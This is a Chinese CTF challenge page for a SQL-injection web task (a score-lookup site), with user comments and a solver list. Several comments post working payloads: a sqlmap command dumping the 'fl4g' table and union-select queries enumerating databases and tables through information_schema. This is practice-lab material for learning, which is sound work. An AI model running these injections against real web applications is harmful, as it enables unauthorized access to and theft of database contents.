成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 12134
提  示:
描  述:
来源山科大ctf
评论
blackjack009 2年前

python sqlmap.py -u http://114.67.175.224:11724/index.php --random-agent --dbms mysql --data="id=1" -p id -v 6 -T fl4g --dump

回复 0

18946551925 2年前

为什么一注入就连接已重置啊??????烦死了,差哪呢?

回复 1

xiaohaisec 2年前

1'报错 1"不报错,所以使用' 查询数据表 -1' union select 1,database(),group_concat(table_name),4 from information_schema.tables where table_schema=database()# sc fl4g 查询表的字段名 -1' union select 1,databa

回复 0

n0pass 2年前

启动环境以后网页打不开啊。。。。。。退钱

回复 0
harry 管理员 2年前

已修复,金币退了

回复 2

老渡真的不懂 2年前

环境有点问题,有时能用有时不能用。试了一下passwd,group,php.ini能看,像我这样的菜鸟也就看看,做不了什么,大神恐怕随随便便就能破坏环境,感觉权限给高了。环境总出问题不会是大佬进去搞破坏了吧?

回复 1

samRsa 2年前

这题也太简单了

回复 0

逐月 2年前

一尝试注入就链接被重置,我真的被气得头疼

回复 1

逐月 2年前

烦死了烦死了一sql注入就页面一直转,然后链接被中断,这是在干什么。。

回复 1

ls666 2年前

首先爆库名:通过id=-1' union select 1,2,3,database()#得到数据库名字skctf_flag; 然后爆表:通过使用 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc

回复 1
xiashuidao 2年前

id=-1‘ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()-- -

回复 1

diverpan 2年前

进不去的????退钱!!!!

回复 0

WriteUp

image
harry

2 金币

评分(24)

解题动态

warm007 攻破了该题 1小时前
oo123 攻破了该题 5小时前
MK 攻破了该题 8小时前
passerpty 攻破了该题 9小时前
LCUT 攻破了该题 10小时前
ROOCCO 攻破了该题 13小时前
秋天下的告白 攻破了该题 14小时前
tomcatlzy 攻破了该题 1天前
gdrhdr 攻破了该题 1天前
佳佳佳 攻破了该题 1天前
xiaoku 攻破了该题 1天前
Aimee Kirk 攻破了该题 1天前
刘译新嘿嘿 攻破了该题 1天前
yehlg 攻破了该题 1天前
1.1 攻破了该题 1天前
www.why 攻破了该题 1天前
伊克尔林 攻破了该题 1天前
qazwsxe 攻破了该题 1天前
颜沫 攻破了该题 1天前
IKUN666NB 攻破了该题 1天前
问题反馈